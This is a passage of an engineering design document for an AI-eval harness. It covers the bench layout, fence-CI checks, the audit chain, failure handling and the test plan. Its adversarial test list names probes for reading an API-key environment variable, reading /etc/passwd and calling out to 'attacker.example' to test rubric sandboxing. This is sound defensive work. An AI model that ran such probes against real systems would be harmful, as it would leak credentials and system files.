- Internal design: Heavy imports deferred per Phase 0 import-linter contract. Stdout is JSONL by default (one `BenchScore` per line, then one aggregate line, then the promotion verdict if `promote-verdict`); structlog logs to stderr. Exit codes: 0 on success; 1 on harness error; 2 on cost-cap exceeded; 3 on `TaskClassNotFound`; 4 on `bench/{name}/cases/` empty.
- Tradeoffs accepted: No `--watch`, no progress bar. `tqdm`-free; this is a CI-first tool.
bench/{task-class-slug}/ directory contract¶
- Provenance: `[B]` layout, `[S]` provenance metadata + CODEOWNERS, `[synth]` no `cases/digests.yaml` central pin.
- Structure (enforced by fence-CI):

  ```text
  bench/{slug}/
  ├── registration.py   # exactly one @register_task_class("{slug}") call;
  │                     # current_tier="bronze" at first register
  ├── rubric.py         # one class implementing Rubric Protocol
  ├── README.md         # what this bench measures + how to add cases
  └── cases/
      └── {case-id}/
          ├── case.toml
          ├── input/          # frozen snapshot OR input-pointer.toml
          ├── expected/
          └── cassette.yaml   # optional; Phase 4 cassette path
  ```
- `case.toml` schema: `case_id`, `task_class`, `disposition` (`positive`/`negative`/`ambiguous`), `difficulty`, `source` (`curated`/`outcome-ledger-derived`/`regression-converted`), `commit_sha` (required iff `source != "curated"`), `added_at`, `last_validated_at`, optional `cassette_path`, optional `cassette_blake3` (the per-case integrity pin from `[S]`'s TB-8; Phase 6.5 makes it advisory; Phase 7+ may make it strict).
- Why this choice over the alternatives: `[S]`'s `cases/digests.yaml` central digest pin is rejected: it forces a central edit on every case add, plus the critic correctly identified that "one mismatch → abort" turns one bad case into nuking the whole night's run. We move integrity pins to per-case (`cassette_blake3` in `case.toml`) and keep them advisory in 6.5 (warn-not-abort) so a single curation typo doesn't block all promotion evidence. CODEOWNERS protection on `bench/**` handles the "soften the corpus" threat at the L1 layer.
- Tradeoffs accepted: Bench cases live in this repo (all three lenses agreed; ADR-0016 §Open Q4 defers the split). When migration cases start including customer Dockerfiles, a sibling `codewizard-sherpa-benches` repo becomes the right move; flagged as an open question for Phase 7's exit review.
Fence-CI test extension¶
- Provenance: `[B]` AST walk, `[S]` literal-decorator lint, `[synth]` alias-dodge fix.
- Purpose: A task class registered via `@register_task_class("foo")` without `bench/foo/{cases,rubric.py,registration.py,README.md}` and ≥10 cases fails CI with a specific diagnostic.
- Internal design: Two-stage. Stage 1: AST-walk every `bench/*/registration.py`, find calls to `register_task_class` (name-or-attribute matching, accepting `register_task_class(...)`, `eval_registry.register_task_class(...)`, etc.) with a string-literal first argument. Reject non-literal first args with a specific error (closes critic's literal-name hole). Stage 2: For each registered name, assert directory contract + ≥ `min_cases_for_promotion["bronze"]` cases (default 10). The name-based matcher cannot see a call made through an aliased import (`from codegenie.eval import register_task_class as rtc`), so a one-line lint rule rejects such imports: the literal symbol name `register_task_class` is required in the decorator position. This closes the critic's alias-dodge; the rule is documented in `bench/README.md`.
- Wall-clock budget: ≤ 2s for the whole fence test (`[P]`'s budget; the AST-only check makes it cheap).
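Stage 1 and the alias lint can be sketched with the standard `ast` module. `scan_registration` is a hypothetical name and the error strings are illustrative; the sketch works on source text only and never imports the file under inspection.

```python
import ast

TARGET = "register_task_class"


def scan_registration(source: str) -> tuple[list[str], list[str]]:
    """Return (registered names, lint errors) for one registration.py source."""
    names, errors = [], []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ImportFrom):
            # Alias lint: the symbol must keep its literal name after import.
            for alias in node.names:
                if alias.name == TARGET and alias.asname not in (None, TARGET):
                    errors.append(
                        f"line {node.lineno}: aliased import of {TARGET} as {alias.asname!r}"
                    )
        elif isinstance(node, ast.Call):
            func = node.func
            # Accept both `register_task_class(...)` and `pkg.register_task_class(...)`.
            callee = (
                func.id if isinstance(func, ast.Name)
                else func.attr if isinstance(func, ast.Attribute)
                else None
            )
            if callee != TARGET:
                continue
            first = node.args[0] if node.args else None
            if isinstance(first, ast.Constant) and isinstance(first.value, str):
                names.append(first.value)
            else:
                errors.append(
                    f"line {node.lineno}: first argument must be a string literal"
                )
    return names, errors
```

Stage 2 would then take each returned name and check that `bench/<name>/` contains the required files and enough case directories.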
Data flow¶
End-to-end codegenie eval run --task-class=vuln-remediation:
- CLI parse + lazy import. `click` parses; `runner.run_eval` and `loader.load_task_class` imported on demand. Phase 6's concrete graph builder is not imported here; the CLI receives an injected `VulnRemediationSut`.
- Loader. `load_task_class("vuln-remediation")` prepends `bench/.resolve()` to `sys.path` once, then `importlib.import_module("vuln_remediation.registration")`. Decorator fires → `default_registry.register(TaskClass(...))` → `TaskClassAlreadyRegistered` on collision (loud crash). `load_cases(task_class)` walks `cases/*/case.toml`, parses with `tomllib`, validates via `BenchCase` Pydantic model. Sorted by `case_id`.
- Runner. `run_eval(...)` async; instantiates `SubprocessRubricRunner`. For each case, in serial (`concurrency=1`):
  - `harness_output = await asyncio.wait_for(system_under_test.run_case(case), timeout=600.0)`: Phase 6's stable `VulnRemediationSut` contract with cassette replay; on `TimeoutError` or `Exception` → `BenchScore(passed=False, failure_modes=("timeout",) or ("harness_error: ...",))`.
  - `score = await rubric_runner.run(rubric_path, case, harness_output, wall_clock_cap_seconds=60.0)`: subprocess spawn with `env={}, cwd=<tmpfs scratch>`; JSON I/O; Pydantic validates output (`extra="forbid"` + `score ∈ [0,1]`).
  - `cost_total += score.cost_usd`; if `cost_total > max_cost_usd`, cancel outstanding tasks, mark `BenchRunReport.aborted = True`, exit code 2.
  - Score emitted as one JSONL line to stdout (structlog diagnostics go to stderr).
- Aggregate. `mean_score`, `passed_count`, `total_cost_usd`, `block_severity_failure_modes` (union across cases). Compute `run_id = sha256(task_class || sorted_case_ids || score_jsons)` (deterministic: two engineers running the same SUT + cassettes get the same `run_id`).
- Audit. `audit.write_run_record(EvalRunRecord(report, prev_hash=..., case_digest_set=..., rubric_digest=..., cassette_digest_set=..., harness_version=..., started_at, finished_at), out_dir=.codegenie/eval/runs/)`. Atomic write via `os.replace(tmp, final)`. Mode 0600. `prev_hash` derived from the most recent prior record for this task class.
- Promotion verdict (optional, via separate subcommand). `promote-verdict --target-tier=silver` reads the latest `EvalRunRecord` for the task class, verifies the chain via `audit.verify`, calls `PromotionGate.evaluate(...)`, prints the verdict as JSON. Does not modify any tier.
- Exit. Code 0 if every case passed AND no `block`-severity failure mode AND not aborted; otherwise non-zero.
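The deterministic `run_id` from the Aggregate step can be sketched as below. The doc writes the input as `task_class || sorted_case_ids || score_jsons` without fixing an encoding, so the NUL separators and the canonical JSON settings here are assumptions, as is the helper name `compute_run_id`.

```python
import hashlib
import json


def compute_run_id(task_class: str, scores_by_case: dict[str, dict]) -> str:
    """SHA-256 over the task class, then each case id and its canonical score JSON."""
    digest = hashlib.sha256()
    digest.update(task_class.encode("utf-8"))
    # Iterating in sorted case-id order removes dependence on insertion order.
    for case_id in sorted(scores_by_case):
        score_json = json.dumps(
            scores_by_case[case_id], sort_keys=True, separators=(",", ":")
        )
        # Assumed framing: NUL bytes keep adjacent fields from running together.
        digest.update(b"\x00" + case_id.encode("utf-8"))
        digest.update(b"\x00" + score_json.encode("utf-8"))
    return digest.hexdigest()
```

Two runs yield the same id only if every hashed score field is itself reproducible, so any timing-dependent field would need to be excluded or normalized before hashing.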
Trust boundary crossings (per security lens):
- TB-1 (curator → bench/): CODEOWNERS-protected branch. [Phase 6.5]
- TB-2 (rubric.py source → rubric executor): SubprocessRubricRunner boundary; JSON I/O over pipe; env={}; cwd=<scratch>. [Phase 6.5]
- TB-3 (rubric subprocess → harness): Pydantic schema validation on JSON output; range checks; wall-clock + RSS caps enforced by harness. [Phase 6.5]
- TB-4 (harness → audit): chained EvalRunRecord writes; codegenie eval verify re-walks. [Phase 6.5]
- TB-5 (audit → promotion gate): gate refuses to read on chain-tamper detection. [Phase 6.5]
- TB-6 (promotion gate → tier change): apply() always raises; tier change is a hand-edited PR. [Phase 6.5]
- TB-7 (outcome ledger → regression-converted cases): contract for Phase 13; Phase 6.5 defines BenchCase.source = "regression-converted" shape but doesn't ship the conversion path. [Phase 13]
- TB-8 (cassette → bench runner): cassette_blake3 per case; advisory in 6.5; strict in 7+. [Phase 7+]
- TB-9 (chain → published anchor): Sigstore/GPG anchors deferred to Phase 16. [Phase 16]
Failure modes & recovery
| Failure | Detected by | Containment | Recovery | Source |
|---|---|---|---|---|
| Duplicate @register_task_class("foo") | TaskClassRegistry.register at import time | TaskClassAlreadyRegistered raised loudly with both qualnames | Rename one; PR cannot land | [B] |
| case.toml malformed | BenchCase Pydantic validation in loader.load_cases | BenchCaseLoadError with case directory + failing field; the failing case is excluded; other cases continue; aggregate marked had_load_errors=True; exit code 1 | Fix case.toml; re-run | [B] modulated: exclude-and-continue is the intentional containment so one bad case doesn't nuke the night (closes critic's [S] "one mismatch → abort" attack); the run still exits non-zero (CLAUDE.md "Fail loud") |
| SUT raises during one case | Per-case try/except Exception in run_eval | BenchScore(passed=False, failure_modes=("harness_error: <Type>: <msg>",), score=0.0, cost_usd=0.0); other cases continue | Investigate the SUT failure; the case becomes a regression test | [B+P] |
| SUT exceeds timeout_per_case_seconds | asyncio.wait_for TimeoutError | BenchScore(passed=False, failure_modes=("timeout",), ...); other cases continue | Widen the timeout if legitimate; otherwise treat as a real failure | [synth] (asyncio.wait_for, not SIGALRM; closes critic's [B] SIGALRM problem) |
| Rubric subprocess returns non-JSON or malformed BenchScore | Subprocess stdout parse + Pydantic validation | BenchScore(passed=False, failure_modes=("rubric_malformed: <detail>",), ...); other cases continue | Investigate the rubric; CI runs rubric unit tests as a separate gate | [S] modulated |
| Rubric subprocess exceeds wall-clock cap | asyncio.wait_for on the subprocess | proc.kill(); BenchScore(passed=False, failure_modes=("rubric_timeout",), ...); other cases continue | Investigate rubric performance; raise cap if legitimate | [S] |
| Rubric attempts env-var read | Subprocess env={} | os.environ.get("ANTHROPIC_API_KEY") returns None; rubric continues but produces a wrong score | Adversarial test (tests/adversarial/test_rubric_env_read.py) catches at PR time | [S] modulated (subprocess, not microVM) |
| Rubric attempts network egress | Not blocked in Phase 6.5; documented gap | An attacker with merged-rubric access can exfiltrate (CODEOWNERS is the L1 defense) | Phase 16 ADR introduces MicroVMRubricRunner; BenchScore shape unchanged so audit chain remains comparable | [synth] (deferred per G13) |
| Cost cap exceeded mid-run | Aggregator after each BenchScore | Cancel outstanding tasks; BenchRunReport.aborted=True; exit code 2 | Cached scores stand for completed cases | [P] |
| Concurrent live runs racing on cost cap | flock on <bench_root>/.<task_class>.runlock for live runs | Second invocation blocks until first releases | Operator runs serially; CI cassette runs skip the lock | [synth] (closes critic's [P] concurrent-cost-leak attack) |
| Audit chain tampered | audit.verify re-walks chain on promote-verdict | ChainTamperDetected raised; promotion gate refuses to read | Investigate (likely operator host compromise); restore from a prior commit's audit dir | [S] modulated |
| bench/{name}/registration.py missing @register_task_class literal | Fence-CI AST walk (Stage 1) | CI fail with named diagnostic; PR blocked | Add the decorator with a literal name | [B+S] |
| New task class registered without bench/{name}/cases/ ≥ 10 cases | Fence-CI dir-walk (Stage 2) | CI fail naming the missing path | Land cases (or land the registration in the same PR with cases) | [B] |
| BenchScore smuggles a banned field name | Static-introspection test + extra="forbid" runtime | CI fail before merge | Rename the field; the substring check is an early warning, not the whole defense | [B+S] |
| promotion.apply() called from code | PromotionMustBeHumanAuthorized raised unconditionally | Loud failure with stack trace | Tier change must be a hand-edited PR | [S] |
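The per-case containment for SUT exceptions and timeouts might look roughly like the sketch below. CaseResult is a hypothetical stdlib stand-in for BenchScore (the design uses a frozen Pydantic model), and run_case is an illustrative name, not the harness API.

```python
import asyncio
from dataclasses import dataclass
from typing import Awaitable, Callable, Tuple


@dataclass(frozen=True)
class CaseResult:
    """Hypothetical stand-in for BenchScore; fields mirror the table above."""
    passed: bool
    score: float
    failure_modes: Tuple[str, ...] = ()
    cost_usd: float = 0.0


async def run_case(
    sut: Callable[[], Awaitable[CaseResult]], timeout_s: float
) -> CaseResult:
    """Run one case; convert a timeout or exception into a failed result."""
    try:
        return await asyncio.wait_for(sut(), timeout=timeout_s)
    except asyncio.TimeoutError:
        # Must be caught before Exception, which would also match it.
        return CaseResult(passed=False, score=0.0, failure_modes=("timeout",))
    except Exception as exc:
        detail = f"harness_error: {type(exc).__name__}: {exc}"
        return CaseResult(passed=False, score=0.0, failure_modes=(detail,))
```

Because every failure is folded into a result value, the loop over cases never sees an exception from a single case, which is what lets other cases continue.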
Resource & cost profile
- Wall-clock for nightly bench/vuln-remediation/ (10 cases, serial, cassette replay): dominated by SUT, typically 10 × 5–30 s = 50–300 s. Subprocess rubric overhead: ~50–200 ms per case (subprocess fork + Python startup + JSON parse). Total nightly: ~1–6 minutes. Acceptable for nightly cadence per ADR-0016 §Decision §5.
- Wall-clock for fence-CI gate: ≤ 2 s.
- CLI cold start: ≤ 600 ms (Phase 0 import-linter contract preserved; pydantic/click/structlog deferred to subcommand body).
- Memory: O(cases) Pydantic instances; ≤ 50 MB for a 100-case run. Subprocess rubric: ~30–80 MB resident per spawn (one at a time in serial mode).
- Disk: Each run writes ~10–30 KB JSON. 365 nightly × 2 task classes × ~20 KB = ~15 MB/yr durable. No retention/rotation in Phase 6.5; Phase 16 adds it.
- LLM cost: $0 in CI (cassettes only). Live operator runs surfaced via BenchScore.cost_usd → BenchRunReport.total_cost_usd; --max-cost-usd (default $5.00) enforces per-run cap; flock enforces cross-process cap.
- Where security/best-practices cost performance: subprocess rubric adds ~50–200 ms/case vs in-process import. At 10 cases × 200 ms = 2 s of nightly overhead, far below the SUT-dominated wall-clock. Worth it to ship the right rubric trust boundary on day one.
- Where the synthesis explicitly defers performance: no cache (G11), no parallelism (G12). The performance lens's headline 8-min cold-cache target becomes ~6-min-and-acceptable. Phase 7+ can layer cache + concurrency on the documented seams (RubricRunner Protocol + concurrency parameter) without invalidating audit-chain comparability. The critic correctly identified that anything reversible can wait.
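The cross-process lock behind the cost cap could be sketched with the standard-library fcntl module. This is an assumption-laden illustration: run_lock and its blocking parameter are hypothetical names, only the lock-file path pattern comes from the design, and fcntl.flock is POSIX-only.

```python
import fcntl
import os
from contextlib import contextmanager
from pathlib import Path


@contextmanager
def run_lock(bench_root: Path, task_class: str, blocking: bool = True):
    """Hold an exclusive advisory lock for one live run of a task class.

    With blocking=True a second invocation waits until the first releases;
    with blocking=False it raises BlockingIOError instead.
    """
    lock_path = bench_root / f".{task_class}.runlock"
    fd = os.open(lock_path, os.O_RDWR | os.O_CREAT, 0o600)
    try:
        flags = fcntl.LOCK_EX | (0 if blocking else fcntl.LOCK_NB)
        fcntl.flock(fd, flags)
        try:
            yield lock_path
        finally:
            fcntl.flock(fd, fcntl.LOCK_UN)
    finally:
        os.close(fd)  # closing the descriptor also drops the lock
```

A live run would wrap its case loop in `with run_lock(bench_root, task_class):`, while cassette runs (cost = 0) would skip the context manager entirely.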
Test plan
Unit tests (≥ 90% line, ≥ 80% branch on src/codegenie/eval/; [B]'s budget kept)
- test_eval_registry.py: decorator registers; duplicate raises TaskClassAlreadyRegistered with both qualnames; default_registry singleton; fresh TaskClassRegistry() for tests.
- test_eval_models.py: frozen=True rejects mutation; extra="forbid" rejects unknown fields; BenchScore.score rejects 1.5/-0.1; BenchCase.disposition rejects unknown literal; commit_sha required iff source != "curated".
- test_bench_score_static.py: load-bearing. Recursive field walk; rejects confidence | llm | self_reported | model_says substrings. (Direct port of Phase 5's test_objective_signals_static.py. Documented as early warning, not whole defense; critic flagged the evidence_strength smuggle path.)
- test_rubric_protocol.py: isinstance(rubric, Rubric) for every registered task class.
- test_loader.py: sorted by case_id; malformed case.toml raises BenchCaseLoadError naming the case dir; missing input/ raises with the missing path; sys.path prepend is idempotent.
- test_runner.py: single-case run produces BenchRunReport; SUT exception → harness_error BenchScore; SUT timeout → timeout BenchScore; rubric malformed output → rubric_malformed BenchScore; rubric timeout → rubric_timeout; aggregate mean_score correct; cost-cap exceed cancels outstanding tasks.
- test_promotion.py: evidence_sufficient=True only when all three conditions met; reasons enumerates every failed condition; apply() raises PromotionMustBeHumanAuthorized; evaluate does not write any file outside the (optional) recommendations dir.
- test_audit.py: atomic write at mode 0600; filename {utc-iso}-{8-hex}.json; prev_hash correctly chains the most-recent prior record for the same task class; verify detects a single-record edit and reports the offending record.
- test_cli.py: --task-class=unknown exits 3; missing --task-class exits 2; --cases='001-*' filters; eval verify walks the chain and reports tampered records.
- test_eval_fence.py: load-bearing. Synthetic bench/foo/ with registration but no cases/ fails; with 9 cases fails; fully-populated passes; non-literal first arg fails with named diagnostic; aliased import (register_task_class as rtc) fails (closes critic's alias-dodge).
- test_eval_package_imports_no_llm_sdk.py: AST walk; reject import anthropic | openai | langchain | langgraph | transformers from src/codegenie/eval/.
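The AST walk behind test_eval_package_imports_no_llm_sdk.py could be sketched like this. The helper name banned_imports is hypothetical; the banned package list is the one named in the test description, and the sketch checks a single source string rather than walking src/codegenie/eval/.

```python
import ast
from typing import List

BANNED_ROOTS = frozenset(
    {"anthropic", "openai", "langchain", "langgraph", "transformers"}
)


def banned_imports(source: str) -> List[str]:
    """Return the sorted module names in `source` whose top-level package is banned."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            # Relative imports (level > 0) stay inside the package; skip them.
            names = [node.module] if node.module and node.level == 0 else []
        else:
            continue
        for name in names:
            if name.split(".")[0] in BANNED_ROOTS:
                found.append(name)
    return sorted(found)
```

A test would read every .py file under the package and assert that the returned list is empty for each. Note that a static walk like this does not see dynamic imports such as importlib.import_module("openai").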
Property tests
- test_benchscore_invariants.py (Hypothesis): 0 ≤ score ≤ 1; failure_modes is a tuple; passed_count(report) ≤ len(report.per_case). Roadmap §Phase 6.5 testing requirement.
- test_runner_aggregate_correctness.py: runner-computed mean_score == statistics.fmean(s.score for s in scores).
Integration tests
- test_eval_end_to_end_vuln.py: codegenie eval run --task-class=vuln-remediation against backfilled bench (10 cases) exits 0; emits 10 JSONL + 1 aggregate; writes one audit JSON; aggregate mean_score matches snapshot (regenerated via scripts/regen_eval_snapshot.py per ADR-0007 contract pattern).
- test_eval_promotion_verdict.py: synthetic BenchRunReport + synthetic registration → PromotionVerdict with right shape; no tier mutation.
- test_phase4_cassette_replay.py: one vuln case via Phase 4 cassette replay; two consecutive runs produce identical run_id. ADR-0016 §Tooling assertion as executable test.
- test_audit_chain_walks.py: write 5 records, verify returns clean; mutate one byte in record 3, verify returns mismatch at record 3.
- test_concurrent_cost_cap.py: two concurrent live-mode eval run invocations on the same task class; second blocks on flock; total cost ≤ cap (closes critic's [P] concurrent-cost-leak attack).
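The behavior test_audit_chain_walks.py exercises can be illustrated with an in-memory chain. This sketch makes several assumptions that are not in the design: it uses hashlib.sha256 as a stdlib stand-in for BLAKE3, keeps records in a list rather than files, and stores a per-record hash field next to prev_hash so that verify can name the edited record itself.

```python
import hashlib
import json
from typing import List, Optional

GENESIS = "0" * 64  # assumed prev_hash for the first record


def _digest(prev_hash: str, payload: dict) -> str:
    """Hash the canonical JSON form of one record's contents."""
    body = json.dumps(
        {"prev_hash": prev_hash, "payload": payload},
        sort_keys=True,
        separators=(",", ":"),
    )
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def append_record(chain: List[dict], payload: dict) -> None:
    """Append a record linked to the hash of the most recent prior record."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    chain.append(
        {"prev_hash": prev_hash, "payload": payload,
         "hash": _digest(prev_hash, payload)}
    )


def verify(chain: List[dict]) -> Optional[int]:
    """Return the 0-based index of the first inconsistent record, or None if clean."""
    expected_prev = GENESIS
    for index, record in enumerate(chain):
        if record["prev_hash"] != expected_prev:
            return index
        if record["hash"] != _digest(record["prev_hash"], record["payload"]):
            return index
        expected_prev = record["hash"]
    return None
```

As the Risks section notes, a chain like this only catches partial edits: someone who rewrites every record and recomputes every hash produces a chain that verifies cleanly.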
Adversarial tests
- test_rubric_env_read.py: rubric subprocess attempts os.environ.get("ANTHROPIC_API_KEY"); assert returned None because subprocess env={}.
- test_rubric_fs_isolation.py: rubric attempts Path("/etc/passwd").read_bytes(); assert it succeeds (subprocess does not block FS; known gap, documented), but a Path("../../../").iterdir() from cwd=<scratch> must show only the scratch contents.
- test_rubric_network_egress.py: xfail with explicit pointer to the future MicroVMRubricRunner ADR; rubric attempts urllib.request.urlopen("http://attacker.example"); passes today, fails (correctly) under microVM.
- test_rubric_cannot_smuggle_llm_assessment.py: rubric tries to return a dict with extra llm_confidence field; assert extra="forbid" raises and the case becomes rubric_malformed.
- test_promotion_apply_blocked.py: direct call to promotion.apply(...) raises PromotionMustBeHumanAuthorized.
- test_chain_tamper_detected.py: rewrite a record byte; audit.verify returns mismatch; promote-verdict exits non-zero.
E2E
- test_eval_run_against_real_bench.py: subprocess.run(["codegenie", "eval", "run", "--task-class=vuln-remediation"]); exit 0; one new audit file; stdout contains 10 JSONL + aggregate.
Golden files
- tests/snapshots/eval_run_report.v1.json: frozen BenchRunReport shape; regen via scripts/regen_eval_snapshot.py (ADR-0007 pattern).
Risks (top 5)
- Subprocess rubric isolation is weaker than microVM and the gap is real. A merged-through-CODEOWNERS rubric can read host FS outside scratch (/etc/passwd), egress to network, and consume unbounded RSS until OS kill. Mitigation: CODEOWNERS + two-reviewer rule on bench/**/rubric.py is the L1 defense; the BenchScore shape is identical between subprocess and microVM so a future ADR-amend swaps the runner without invalidating prior audit records (the load-bearing critic argument). The roadmap explicitly tracks this in a Phase 16 ADR slot.
- Bench-case curation cost dominates Phase 6.5's actual schedule. ADR-0016 §Tradeoffs flags this; no design can fix it. Mitigation: ship bench/vuln-remediation/ from Phases 3–4's solved-example corpus (zero net curation, just re-shaping); ship bench/migration-chainguard-distroless/ with 3 seed cases from publicly-documented Chainguard examples; Phase 7 owns the expansion to ≥10. Critic correctly noted no design allocates engineering for case extraction; flagged for the implementation plan.
- Rubric correctness is itself untested. A bug in rubric.score(...) makes every bench score wrong. Mitigation: every rubric ships with its own unit tests under bench/{tc}/tests/; CI runs them. Mutation-testing the rubric is ADR-0016 §Open Q5, which is Phase 16 territory.
- current_tier lives in registration.py (a Python file edited by humans). A typo in a tier promotion PR ("silver" → "siver") could pass review and silently fail the gate's Literal[...] check at runtime. Mitigation: BenchCase.disposition and PromotionVerdict.current_tier and TaskClass.current_tier all use Literal["bronze","silver","gold","platinum"] so Pydantic catches typos at registration import; fence-CI runs registration imports for every task class.
- The audit chain catches local tamper but not host-compromise-with-full-rewrite. An attacker with shell on the operator can rewrite every .json record and recompute every prev_hash, so local re-verify passes. Mitigation: Phase 16 ADR introduces published anchors (a daily commit of the chain head into git history); deferring per G13 because Sigstore vs. GPG is the wrong question to ship in Phase 6.5. Documented as a known gap.
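The tier-typo mitigation relies on Pydantic validating a Literal field at import time. The same idea can be shown with the standard library alone; parse_tier is a hypothetical helper used here only to illustrate the check, not part of the design.

```python
from typing import Literal, get_args

Tier = Literal["bronze", "silver", "gold", "platinum"]
VALID_TIERS = get_args(Tier)  # the four allowed strings, in declaration order


def parse_tier(value: str) -> str:
    """Return `value` if it is a known tier; raise ValueError on anything else."""
    if value not in VALID_TIERS:
        raise ValueError(f"unknown tier {value!r}; expected one of {VALID_TIERS}")
    return value
```

If registration import performs this kind of check, a "siver" typo fails fence-CI on the promotion PR itself rather than surfacing later at gate time.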
Synthesis ledger
Vertex count
- Performance design [P]: ~38 atomic decisions extracted (cache, sut_digest, cassette_digest, asyncio pool, JSONL stream, repo.tar.zst, cost cap, runs.jsonl index, etc.)
- Security design [S]: ~42 (microVM rubric, BLAKE3 chain, Sigstore anchors, two-signature curation, cases/digests.yaml, TB-1..TB-8 boundaries, apply() raises, etc.)
- Best-practices design [B]: ~34 (Protocol vs ABC, default_registry singleton, signal.SIGALRM, _codegenie_bench import prefix, docs/trust-tiers.yaml, tomllib, etc.)
- Total: ~114 vertices.
Edges
- AGREE: 22 (Pydantic frozen=True, extra="forbid"; @register_task_class decorator; TaskClassAlreadyRegistered collision shape; BenchScore.score ∈ [0,1]; static-introspection test on banned substrings; cassettes-only in CI; promotion is human; bench/{tc}/{cases,rubric.py,registration.py} directory contract; per-case try/except; CODEOWNERS on bench/**; etc.)
- CONFLICT: 13 (concurrency model; rubric isolation; cache layer; audit shape: JSONL vs chain vs Phase-0 RunRecord; bench provenance: descriptive vs two-signature vs CODEOWNERS-only; archive format: .tar.zst vs unspecified vs input/expected/ dirs; cost cap; promotion authority shape; fence-CI implementation; hash algorithm; tier-state location: registration vs YAML; timeout mechanism; sandbox stack)
- COMPLEMENT: 8 ([B]'s typed errors + [S]'s adversarial tests + [P]'s property tests; [B]'s loader pattern + [S]'s digest verification; [P]'s cost cap + [B]'s ledger surfacing + [S]'s cost-discussion-deferral)
- SUBSUME: 5 ([B]'s and [P]'s rubric isolation are weaker variants of the same thing; [S]'s BenchRunRecord subsumes [B]'s EvalRunRecord shape)
Conflict-resolution table
| Dimension | [P] picks | [S] picks | [B] picks | Winner | Exit-fit | Roadmap-fit | Commitments-fit | Critic-fit | Sum |
|---|---|---|---|---|---|---|---|---|---|
| Rubric isolation | In-process import | Per-case microVM (Firecracker/gVisor) | In-process import + Pydantic + static check | Subprocess (env={}, JSON I/O) (synth) | 3 | 3 | 3 | 3 | 12 |
| Concurrency | asyncio pool sized to sandbox cap | Strict serial (asserted) | Serial + SIGALRM | Serial in 6.5 with concurrency seam ([B+S]+synth) | 3 | 3 | 3 | 2 | 11 |
| Cache layer | Content-addressed BenchScore cache | None (deferred) | None | None in 6.5; documented seam ([S+B]+synth) | 3 | 3 | 3 | 3 | 12 |
| Audit shape | JSONL stream + runs.jsonl index | BLAKE3-chained records + Sigstore anchors | Phase-0 RunRecord JSON | Chained JSON records (no Sigstore) ([B+S] minus L6) | 3 | 3 | 3 | 3 | 12 |
| Bench provenance | Descriptive metadata | Two-signature CODEOWNERS + Sigstore + cases/digests.yaml | CODEOWNERS + 90-day staleness warn | CODEOWNERS + per-case cassette_blake3 advisory + staleness warn ([B]+synth) | 3 | 3 | 2 | 3 | 11 |
| Bench archive format | .tar.zst level 3 | Tar-serialization (unspecified) | input/+expected/ dirs | input/+expected/ dirs (no archive) ([B]) | 3 | 2 | 3 | 3 | 11 |
| Cost cap | --max-cost-usd mid-run abort | Deferred to Phase 13 | Sum into report only | --max-cost-usd + flock cross-process ([P]+synth) | 3 | 3 | 3 | 3 | 12 |
| Promotion authority | Read-only verdict as last JSONL line | apply() raises; tier in registration.py#current_tier | Read-only verdict; tier in docs/trust-tiers.yaml | apply() raises + tier in registration.py ([S]) | 3 | 3 | 3 | 3 | 12 |
| Fence-CI implementation | Regex on first/second line | Three gates incl. workflow-digest meta-gate | AST walk for literal name | AST walk + literal-symbol-name lint (no aliases) ([B+S]+synth) | 3 | 3 | 3 | 3 | 12 |
| Hash algorithm | blake3 PyPI dep | BLAKE3 via codegenie/hashing.py | SHA-256 implied | BLAKE3 (matches Phase 0) in [project.optional-dependencies].eval ([S]+synth) | 3 | 3 | 3 | 3 | 12 |
| Tier-state location | On registration (implicit) | On registration | docs/trust-tiers.yaml | On registration ([P+S]) | 3 | 3 | 3 | 3 | 12 |
| Timeout mechanism | asyncio.wait_for (implicit) | Subprocess wall-clock | signal.SIGALRM | asyncio.wait_for ([P]+synth) | 3 | 3 | 3 | 3 | 12 |
| Sandbox stack | None (in-process) | Firecracker on Linux/CI; gVisor-on-Lima on macOS | None | Subprocess only (synth; defers Phase 5's sandbox stack question) | 3 | 3 | 2 | 3 | 11 |

(Score legend per Step-3: 0=cannot win, 1=poor fit, 2=acceptable, 3=strong fit. Veto-strength on column 3.)
Shared blind spots considered
| Blind spot (critic) | Carried forward / departed | Why |
|---|---|---|
| All three keep bench/ in same repo (ADR-0016 §Open Q4 deferred) | Carried forward for Phase 6.5; flagged for Phase 7 review | Splitting introduces the org-shared-bench question (CODEOWNERS spans repos, etc.) the critic correctly identifies as Phase 7+ territory. Same-repo is the conservative default; flagged in §Risks. |
| All three hand-wave the live-LLM cadence | Carried forward (no live-cadence commitment); G8 caps cost, defers cadence to Phase 13 | The critic is right that nobody knows when live evals run. We ship cost protection (--max-cost-usd + flock) so nobody can be surprised by a bill, and defer cadence per ADR-0016 §Open Q3. |
| All three treat bench/vuln-remediation/ curation as easy | Departed; flagged in §Risks #2 | Critic correctly notes none of the three allocates engineering for case extraction. Synthesizer flags this for the implementation plan; the harness is necessary but not sufficient, since somebody has to extract 10 cases from the Phases 3–4 corpus. |
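The cost protection mentioned above can be illustrated for the serial runner, where "cancel outstanding tasks" reduces to stopping the loop. Report and run_with_cost_cap are hypothetical names, and each case is modeled as a callable that returns its cost in USD; only the $5.00 default and the aborted flag come from the design.

```python
from dataclasses import dataclass, field
from typing import Callable, Iterable, List, Tuple


@dataclass
class Report:
    """Hypothetical stand-in for BenchRunReport, reduced to cost fields."""
    per_case: List[Tuple[str, float]] = field(default_factory=list)
    total_cost_usd: float = 0.0
    aborted: bool = False


def run_with_cost_cap(
    cases: Iterable[Tuple[str, Callable[[], float]]],
    max_cost_usd: float = 5.00,
) -> Report:
    """Run cases in order; stop as soon as the running total exceeds the cap."""
    report = Report()
    for case_id, run_case in cases:
        cost = run_case()
        report.per_case.append((case_id, cost))
        report.total_cost_usd += cost
        # The check runs after each case, so the case that crosses the cap
        # is still recorded and the total can overshoot by one case's cost.
        if report.total_cost_usd > max_cost_usd:
            report.aborted = True
            break
    return report
```

The overshoot is inherent to a check that runs after each score: the cap bounds the run to at most one case's cost beyond the limit, not to the limit exactly.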
Departures from all three inputs
